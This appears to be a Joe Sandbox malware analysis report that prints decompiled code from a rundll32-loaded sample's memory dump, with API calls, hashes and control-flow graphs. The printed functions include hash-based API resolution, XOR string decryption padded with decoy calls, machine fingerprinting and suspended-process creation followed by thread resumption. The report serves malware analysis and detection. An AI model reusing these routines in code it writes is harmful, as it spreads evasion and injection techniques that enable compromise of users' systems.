                                                                      • Opcode ID: 5e309462242fb3a50108344237ba0cf5d8f93ddc881244d5d149bbb84632b0f3
                                                                      • Instruction ID: d0c701e214561e466efdc3c0d296341d80fa29cf1aa6f0527675bf4cb851d560
                                                                      • Opcode Fuzzy Hash: 5e309462242fb3a50108344237ba0cf5d8f93ddc881244d5d149bbb84632b0f3
                                                                      • Instruction Fuzzy Hash: C0418172D812199FDF21DFA4C984DEEBBB9EBC8724F240579D801A7240EB31AD458B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 257 49492f0-4949307 258 4949364 257->258 259 4949309-4949331 257->259 261 4949366-494936a 258->261 259->258 260 4949333-4949356 call 494ce25 call 494e605 259->260 266 4949358-4949362 260->266 267 494936b-4949382 260->267 266->258 266->260 268 4949384-494938c 267->268 269 49493d8-49493da 267->269 268->269 270 494938e 268->270 269->261 271 4949390-4949396 270->271 272 49493a6-49493b7 271->272 273 4949398-494939a 271->273 274 49493bc-49493c8 LoadLibraryA 272->274 275 49493b9-49493ba 272->275 273->272 276 494939c-49493a4 273->276 274->258 277 49493ca-49493d4 GetProcAddress 274->277 275->274 276->271 276->272 277->258 278 49493d6 277->278 278->261
                                                                      C-Code - Quality: 100%
                                                                      			E049492F0(void* __ecx, intOrPtr __edx) {
                                                                      				signed int _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				char _v92;
                                                                      				intOrPtr _t41;
                                                                      				signed int _t47;
                                                                      				signed int _t49;
                                                                      				signed int _t51;
                                                                      				void* _t56;
                                                                      				struct HINSTANCE__* _t58;
                                                                      				_Unknown_base(*)()* _t59;
                                                                      				intOrPtr _t60;
                                                                      				void* _t62;
                                                                      				intOrPtr _t63;
                                                                      				void* _t69;
                                                                      				char _t70;
                                                                      				void* _t75;
                                                                      				CHAR* _t80;
                                                                      				void* _t82;
                                                                      
                                                                      				_t75 = __ecx;
                                                                      				_v12 = __edx;
                                                                      				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                      				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                      				if(_t41 == 0) {
                                                                      					L4:
                                                                      					return 0;
                                                                      				}
                                                                      				_t62 = _t41 + __ecx;
                                                                      				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                      				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                      				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                      				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                      				_t47 = 0;
                                                                      				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                      				_v8 = 0;
                                                                      				_v16 = _t63;
                                                                      				if(_t63 == 0) {
                                                                      					goto L4;
                                                                      				} else {
                                                                      					goto L2;
                                                                      				}
                                                                      				while(1) {
                                                                      					L2:
                                                                      					_t49 = E0494E605( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0494CE25( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                      					_t51 = _v8;
                                                                      					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                      						break;
                                                                      					}
                                                                      					_t73 = _v20;
                                                                      					_t47 = _t51 + 1;
                                                                      					_v8 = _t47;
                                                                      					if(_t47 < _v16) {
                                                                      						continue;
                                                                      					}
                                                                      					goto L4;
                                                                      				}
                                                                      				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                      				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                      				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                      					return _t80;
                                                                      				} else {
                                                                      					_t56 = 0;
                                                                      					while(1) {
                                                                      						_t70 = _t80[_t56];
                                                                      						if(_t70 == 0x2e || _t70 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                      						_t56 = _t56 + 1;
                                                                      						if(_t56 < 0x40) {
                                                                      							continue;
                                                                      						}
                                                                      						break;
                                                                      					}
                                                                      					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                      					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                      					if( *((char*)(_t56 + _t80)) != 0) {
                                                                      						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                      					}
                                                                      					_t40 =  &_v92; // 0x6c6c642e
                                                                      					_t58 = LoadLibraryA(_t40); // executed
                                                                      					if(_t58 == 0) {
                                                                      						goto L4;
                                                                      					}
                                                                      					_t59 = GetProcAddress(_t58, _t80);
                                                                      					if(_t59 == 0) {
                                                                      						goto L4;
                                                                      					}
                                                                      					return _t59;
                                                                      				}
                                                                      			}


























                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(.dll,?,00000144,00000000), ref: 049493C0
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 049493CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: .dll
                                                                      • API String ID: 2574300362-2738580789
                                                                      • Opcode ID: c8ada6f12bad4a5faf0291f9b2b6321d25941dda25ab0d02dba2d756f62ff718
                                                                      • Instruction ID: 11edc47729a64369000cfd581624ce1e148d556817eeb90c224258eaada9f968
                                                                      • Opcode Fuzzy Hash: c8ada6f12bad4a5faf0291f9b2b6321d25941dda25ab0d02dba2d756f62ff718
                                                                      • Instruction Fuzzy Hash: EE3181B1A002559BCB28CF79C884AAFBBF9BF86308F244479D845D72A1D770ED41C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 94%
                                                                      			E0494D04D(WCHAR* __ecx, WCHAR* __edx, void* __eflags) {
                                                                      				long _v8;
                                                                      				long _v12;
                                                                      				WCHAR* _v16;
                                                                      				char _v528;
                                                                      				short _v1040;
                                                                      				short _v1552;
                                                                      				intOrPtr _t23;
                                                                      				WCHAR* _t26;
                                                                      				signed int _t28;
                                                                      				void* _t32;
                                                                      				long _t37;
                                                                      				WCHAR* _t42;
                                                                      				WCHAR* _t57;
                                                                      				void* _t60;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_t42 = __edx;
                                                                      				_t57 = __ecx;
                                                                      				E049492A2(__edx, 0, 0x100);
                                                                      				_v12 = 0x100;
                                                                      				_t23 =  *0x4960fa0; // 0x49ff8a0
                                                                      				 *((intOrPtr*)(_t23 + 0xc0))( &_v12);
                                                                      				E0494C145(__edx,  &_v528, 0x100);
                                                                      				 *((intOrPtr*)(_t60 + 0xc)) = 0x331;
                                                                      				_t26 = E049490EA(__edx,  &_v528);
                                                                      				_v16 = _t26;
                                                                      				_t28 = GetVolumeInformationW(_t26,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                      				asm("sbb eax, eax");
                                                                      				_v8 = _v8 &  ~_t28;
                                                                      				E04949D66( &_v16);
                                                                      				_t32 = E0494CE3E(_t42);
                                                                      				E0494C08E( &(_t42[E0494CE3E(_t42)]), 0x100 - _t32, L"%u", _v8);
                                                                      				lstrcatW(_t42, _t57);
                                                                      				_t37 = E0494CE3E(_t42);
                                                                      				_v12 = _t37;
                                                                      				CharUpperBuffW(_t42, _t37);
                                                                      				return E0494E605(_t42, E0494CE3E(_t42) + _t39, 0);
                                                                      			}


















                                                                      APIs
                                                                        • Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4
                                                                      • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0494D0C7
                                                                        • Part of subcall function 0494C08E: _vsnwprintf.MSVCRT ref: 0494C0AB
                                                                      • lstrcatW.KERNEL32(?,00000114), ref: 0494D100
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0494D112
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatmemset
                                                                      • String ID:
                                                                      • API String ID: 3467380347-0
                                                                      • Opcode ID: e4e2966c34a881eb65f95b3c51ebe38b3367684709f064ee647e7cf0e0187cb4
                                                                      • Instruction ID: 11872eb5f2a85d8e500bad4880801430697b5b8fc45004485de359387e7ffda8
                                                                      • Opcode Fuzzy Hash: e4e2966c34a881eb65f95b3c51ebe38b3367684709f064ee647e7cf0e0187cb4
                                                                      • Instruction Fuzzy Hash: 562130B2A01214BFEB14ABB4DC89FAF77BCEBC5214F104579E506D7180EA746F048B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 321 494dbaf-494dbcf GetTokenInformation 322 494dc15 321->322 323 494dbd1-494dbda GetLastError 321->323 325 494dc17-494dc1b 322->325 323->322 324 494dbdc-494dbec call 494911f 323->324 328 494dbf2-494dc05 GetTokenInformation 324->328 329 494dbee-494dbf0 324->329 328->322 330 494dc07-494dc13 call 494913b 328->330 329->325 330->329
                                                                      C-Code - Quality: 86%
                                                                      			E0494DBAF(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                      				long _v8;
                                                                      				void* _v12;
                                                                      				void* _t12;
                                                                      				void* _t20;
                                                                      				void* _t22;
                                                                      				union _TOKEN_INFORMATION_CLASS _t28;
                                                                      				void* _t31;
                                                                      
                                                                      				_push(_t22);
                                                                      				_push(_t22);
                                                                      				_t31 = 0;
                                                                      				_t28 = __edx;
                                                                      				_t20 = _t22;
                                                                      				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                      					L6:
                                                                      					_t12 = _t31;
                                                                      				} else {
                                                                      					_t31 = E0494911F(_v8);
                                                                      					_v12 = _t31;
                                                                      					if(_t31 != 0) {
                                                                      						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                      							goto L6;
                                                                      						} else {
                                                                      							E0494913B( &_v12, _t16);
                                                                      							goto L3;
                                                                      						}
                                                                      					} else {
                                                                      						L3:
                                                                      						_t12 = 0;
                                                                      					}
                                                                      				}
                                                                      				return _t12;
                                                                      			}











                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04940000,00000000,00000000,?,0494DC30,00000000,00000000,?,0494DC59), ref: 0494DBCA
                                                                      • GetLastError.KERNEL32(?,0494DC30,00000000,00000000,?,0494DC59,00001644,?,0494BBDE), ref: 0494DBD1
                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0494DC30,00000000,00000000,?,0494DC59,00001644,?,0494BBDE), ref: 0494DC00
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InformationToken$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2567405617-0
                                                                      • Opcode ID: 4a8a5b2a30cda89ccbd84c766ff5930690e6f140742f9ce37f8c57c62486f397
                                                                      • Instruction ID: 09add43b99b1ba83473fd42bcd9039a2cfc1be4814a5a5c109f31da8cb3aa667
                                                                      • Opcode Fuzzy Hash: 4a8a5b2a30cda89ccbd84c766ff5930690e6f140742f9ce37f8c57c62486f397
                                                                      • Instruction Fuzzy Hash: EA01AD7A710224BF9B209AA5DC8DDAF7FBCDF896A5B100639F506D2100E670ED408BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 333 494a952-494a98b call 494bfab 337 494a9c2-494a9c6 333->337 338 494a98d-494a9b1 GetLastError ResumeThread 333->338 340 494a9b6-494a9c0 FindCloseChangeNotification 338->340 341 494a9b3-494a9b5 338->341 340->337 341->340
                                                                      C-Code - Quality: 86%
                                                                      			E0494A952(void* __ecx, void* __eflags) {
                                                                      				char _v44;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t12;
                                                                      				void* _t13;
                                                                      				intOrPtr _t17;
                                                                      				void* _t20;
                                                                      				void* _t21;
                                                                      				void* _t28;
                                                                      				void* _t29;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      
                                                                      				_t9 =  *0x4960fd8; // 0x49ffc50
                                                                      				_t1 = _t9 + 0xac; // 0x86090ac1
                                                                      				_t21 = __ecx;
                                                                      				E0494BFAB( &_v44,  *_t1 + 7, __eflags);
                                                                      				_t32 = 0;
                                                                      				_t12 =  *0x4960fa0; // 0x49ff8a0
                                                                      				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
                                                                      				_t29 = _t13;
                                                                      				if(_t29 != 0) {
                                                                      					GetLastError();
                                                                      					ResumeThread( *(_t21 + 4));
                                                                      					_t17 =  *0x4960fa0; // 0x49ff8a0
                                                                      					_push(0x2710);
                                                                      					_push(_t29);
                                                                      					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
                                                                      						_t32 = 1;
                                                                      					}
                                                                      					FindCloseChangeNotification(_t29);
                                                                      					_t13 = _t32;
                                                                      				}
                                                                      				return _t13;
                                                                      			}















                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,04944C08), ref: 0494A98D
                                                                      • ResumeThread.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,04944C08), ref: 0494A99B
                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,04944C08), ref: 0494A9BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseErrorFindLastNotificationResumeThread
                                                                      • String ID:
                                                                      • API String ID: 4135917582-0
                                                                      • Opcode ID: 8b9a05d68a54463873320d4f456b13badf286e608570b39da9bb24b14cddb491
                                                                      • Instruction ID: cf016c147365a7ecb8fd784fec64bd053f3b62e099eec669f1786f892c92bf48
                                                                      • Opcode Fuzzy Hash: 8b9a05d68a54463873320d4f456b13badf286e608570b39da9bb24b14cddb491
                                                                      • Instruction Fuzzy Hash: A1014B32245110EFC701EBA8E888EAA7FBCFB89651B45407DFA05E7245DA64EC01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 360 4949c9b-4949cb0 361 4949cd6-4949cf4 GetNumberFormatA 360->361 362 4949cb2-4949cc3 360->362 365 4949cf6 361->365 366 4949d00 361->366 363 4949cc5-4949cc8 362->363 364 4949ccf-4949cd4 362->364 363->362 367 4949cca-4949ccd 363->367 364->361 368 4949cf8-4949cfc 365->368 369 4949d02-4949d06 366->369 367->361 368->368 370 4949cfe 368->370 369->369 371 4949d08-4949d1a call 494911f 369->371 370->371 374 4949d23-4949d25 371->374 375 4949d1c-4949d21 371->375 377 4949d45 374->377 378 4949d27-4949d43 374->378 376 4949d47-4949d4b 375->376 377->376 378->377 378->378
                                                                      C-Code - Quality: 100%
                                                                      			E04949C9B(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                      				intOrPtr _v8;
                                                                      				char _v88;
                                                                      				int _t19;
                                                                      				struct _numberfmt* _t29;
                                                                      				signed int _t33;
                                                                      				signed int _t34;
                                                                      				struct _numberfmt* _t36;
                                                                      				void* _t38;
                                                                      				void* _t41;
                                                                      				struct _numberfmt* _t44;
                                                                      				signed int _t45;
                                                                      
                                                                      				_t41 = __edx;
                                                                      				_t45 = _a12;
                                                                      				_t44 = 0;
                                                                      				_v8 = __ecx;
                                                                      				_t33 = 0;
                                                                      				if(_t45 >= __edx) {
                                                                      					L5:
                                                                      					_t19 = GetNumberFormatA(0x7d3, 0xb4, "electricmadness", _t44,  &_v88, 0x22); // executed
                                                                      					if(_t19 != 0) {
                                                                      						_t36 = _t44;
                                                                      						do {
                                                                      							_t36 = _t36 + 1;
                                                                      						} while (_t36 < 0x22);
                                                                      						L11:
                                                                      						_t38 = E0494911F(2 + _t33 * 2);
                                                                      						if(_t38 != 0) {
                                                                      							if(_t33 == 0) {
                                                                      								L15:
                                                                      								return _t38;
                                                                      							} else {
                                                                      								goto L14;
                                                                      							}
                                                                      							do {
                                                                      								L14:
                                                                      								 *((short*)(_t38 + _t44 * 2)) = ( *((_t45 & 0x0000007f) + _a4) ^  *(_t45 + _v8)) & 0x000000ff;
                                                                      								_t44 = _t44 + 1;
                                                                      								_t45 = _t45 + 1;
                                                                      							} while (_t44 < _t33);
                                                                      							goto L15;
                                                                      						}
                                                                      						return 0x49610a8;
                                                                      					}
                                                                      					_t29 = _t44;
                                                                      					do {
                                                                      						_t29 = _t29 + 1;
                                                                      					} while (_t29 < 0x14);
                                                                      					goto L11;
                                                                      				}
                                                                      				while( *((_t45 & 0x0000007f) + _a4) !=  *(_t45 + _v8)) {
                                                                      					_t45 = _t45 + 1;
                                                                      					if(_t45 < _t41) {
                                                                      						continue;
                                                                      					}
                                                                      					_t45 = _a12;
                                                                      					goto L5;
                                                                      				}
                                                                      				_t34 = _t45;
                                                                      				_t45 = _a12;
                                                                      				_t33 = _t34 - _t45;
                                                                      				goto L5;
                                                                      			}















                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FormatNumber
                                                                      • String ID: electricmadness
                                                                      • API String ID: 481257995-1127315026
                                                                      • Opcode ID: 4bc7ef5b81dc9ce0afa054e83a096e18ef5a2852f03e8418282c73be52ba1a4f
                                                                      • Instruction ID: 38c2c3b311a8351d1ced60cc7d400e41e6d2abef44f9c4918e6b7cc8a4b0b3de
                                                                      • Opcode Fuzzy Hash: 4bc7ef5b81dc9ce0afa054e83a096e18ef5a2852f03e8418282c73be52ba1a4f
                                                                      • Instruction Fuzzy Hash: 721106B27043556FDB149F78D841EBB37AAABC9619B140479F996EB251D670FC02C380
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 379 4949bf7-4949c0a 380 4949c21-4949c41 GetNumberFormatA 379->380 381 4949c0c 379->381 383 4949c43-4949c47 380->383 384 4949c89-4949c8d 380->384 382 4949c0f-4949c1a 381->382 385 4949c1c-4949c1f 382->385 386 4949c4b-4949c4d 382->386 383->383 387 4949c49 383->387 384->384 388 4949c8f 384->388 385->380 385->382 386->380 390 4949c4f-4949c53 call 494911f 386->390 387->388 389 4949c94 388->389 391 4949c96-4949c9a 389->391 393 4949c58-4949c60 390->393 394 4949c62-4949c67 393->394 395 4949c69-4949c6e 393->395 394->391 396 4949c70-4949c82 395->396 396->396 397 4949c84-4949c87 396->397 397->389
                                                                      C-Code - Quality: 100%
                                                                      			E04949BF7(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                      				intOrPtr _v8;
                                                                      				char _v88;
                                                                      				signed int _t21;
                                                                      				struct _numberfmt* _t27;
                                                                      				intOrPtr _t28;
                                                                      				intOrPtr _t29;
                                                                      				signed int _t30;
                                                                      				signed int _t32;
                                                                      				intOrPtr _t33;
                                                                      				void* _t34;
                                                                      				void* _t36;
                                                                      				signed int _t37;
                                                                      				signed int _t38;
                                                                      				void* _t39;
                                                                      
                                                                      				_t34 = __edx;
                                                                      				_t29 = __ecx;
                                                                      				_t37 = _a12;
                                                                      				_t38 = _t37;
                                                                      				_v8 = __ecx;
                                                                      				if(_t37 >= __edx) {
                                                                      					L4:
                                                                      					_t27 = 0;
                                                                      					if(GetNumberFormatA(0xdc, 0x172, "chickenfried", 0,  &_v88, 0x22) != 0) {
                                                                      						do {
                                                                      							_t27 = _t27 + 1;
                                                                      						} while (_t27 < 0x22);
                                                                      						L14:
                                                                      						_t30 = 0x496107e;
                                                                      						L15:
                                                                      						return _t30;
                                                                      					} else {
                                                                      						goto L5;
                                                                      					}
                                                                      					do {
                                                                      						L5:
                                                                      						_t27 = _t27 + 1;
                                                                      					} while (_t27 < 0x14);
                                                                      					goto L14;
                                                                      				}
                                                                      				_t28 = _a4;
                                                                      				while( *((intOrPtr*)((_t38 & 0x0000007f) + _t28)) !=  *((intOrPtr*)(_t38 + _t29))) {
                                                                      					_t38 = _t38 + 1;
                                                                      					if(_t38 < _t34) {
                                                                      						continue;
                                                                      					}
                                                                      					goto L4;
                                                                      				}
                                                                      				_t39 = _t38 - _t37;
                                                                      				if(_t39 == 0) {
                                                                      					goto L4;
                                                                      				}
                                                                      				_t21 = E0494911F(_t39 + 1); // executed
                                                                      				_t32 = _t21;
                                                                      				_a12 = _t32;
                                                                      				if(_t32 != 0) {
                                                                      					_t33 = _v8;
                                                                      					_t36 = _t32 - _t37;
                                                                      					do {
                                                                      						 *(_t36 + _t37) =  *((_t37 & 0x0000007f) + _t28) ^  *(_t37 + _t33);
                                                                      						_t37 = _t37 + 1;
                                                                      						_t39 = _t39 - 1;
                                                                      					} while (_t39 != 0);
                                                                      					_t30 = _a12;
                                                                      					goto L15;
                                                                      				}
                                                                      				return 0x496107e;
                                                                      			}


















                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FormatNumber
                                                                      • String ID: chickenfried
                                                                      • API String ID: 481257995-586419266
                                                                      • Opcode ID: d66118e26c5f6de98aaded285a8352c4ab70fd5a8c49929f7ff1db4fd34bd749
                                                                      • Instruction ID: c2efe5d5a7bcfe3f8263f1106c2d24f98fb69bedf7beb726fd3b43258a51e6ef
                                                                      • Opcode Fuzzy Hash: d66118e26c5f6de98aaded285a8352c4ab70fd5a8c49929f7ff1db4fd34bd749
                                                                      • Instruction Fuzzy Hash: D5112BF1B043566FD7148FBCC881DAB7BEE9BC5206B104579E59A9B251E520FC018350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 398 494ca94-494cae3 call 49492a2 * 2 CreateProcessW
                                                                      C-Code - Quality: 79%
                                                                      			E0494CA94(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                      				struct _STARTUPINFOW _v72;
                                                                      				signed int _t11;
                                                                      
                                                                      				E049492A2(__edx, 0, 0x10);
                                                                      				E049492A2( &_v72, 0, 0x44);
                                                                      				_v72.cb = 0x44;
                                                                      				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                      				asm("sbb eax, eax");
                                                                      				return  ~( ~_t11) - 1;
                                                                      			}






                                                                      APIs
                                                                        • Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4
                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 0494CAD6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcessmemset
                                                                      • String ID: D
                                                                      • API String ID: 2296119082-2746444292
                                                                      • Opcode ID: 65c812ec78ebc784e25d127ed0c9cd9dc01f4954b4c5bb219a9475f045574894
                                                                      • Instruction ID: 1f6b54dda3912c10ddc4f9466abcb599a2eaaaa8f28e75cb53fd69da38a5bdda
                                                                      • Opcode Fuzzy Hash: 65c812ec78ebc784e25d127ed0c9cd9dc01f4954b4c5bb219a9475f045574894
                                                                      • Instruction Fuzzy Hash: 9CF065F26442087EF720E665CC0AFBF3AACDBC1714F504125BB05EB1C0E5A4AD0582B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E04941494(void* __edi, void* __fp0) {
                                                                      				char _v8;
                                                                      				void* __ecx;
                                                                      				char _t19;
                                                                      				intOrPtr _t22;
                                                                      				intOrPtr _t24;
                                                                      				intOrPtr _t25;
                                                                      				signed int _t27;
                                                                      				signed int _t29;
                                                                      				intOrPtr _t30;
                                                                      				signed int _t31;
                                                                      				intOrPtr _t34;
                                                                      				intOrPtr* _t36;
                                                                      				void* _t37;
                                                                      				intOrPtr _t40;
                                                                      				void* _t50;
                                                                      				intOrPtr _t52;
                                                                      				void* _t56;
                                                                      				void* _t58;
                                                                      				signed int _t60;
                                                                      				char _t62;
                                                                      
                                                                      				_t68 = __fp0;
                                                                      				E049415D4();
                                                                      				_t19 = E0494911F(0x20);
                                                                      				_v8 = _t19;
                                                                      				_t54 = 0x1f;
                                                                      				do {
                                                                      					_t2 = _t54 + 0x63; // 0x82
                                                                      					 *((char*)(_t54 + _t19)) = _t2;
                                                                      					_t54 = _t54 - 1;
                                                                      				} while (_t54 >= 0);
                                                                      				E0494913B( &_v8, 0);
                                                                      				_t22 = E0494BB4D(_t54, __fp0); // executed
                                                                      				 *0x4960fd8 = _t22;
                                                                      				if(_t22 != 0) {
                                                                      					E04954257( *((intOrPtr*)(_t22 + 0x224)));
                                                                      					_t24 =  *0x4960fd8; // 0x49ffc50
                                                                      					_t60 = 1;
                                                                      					_t50 = _t58;
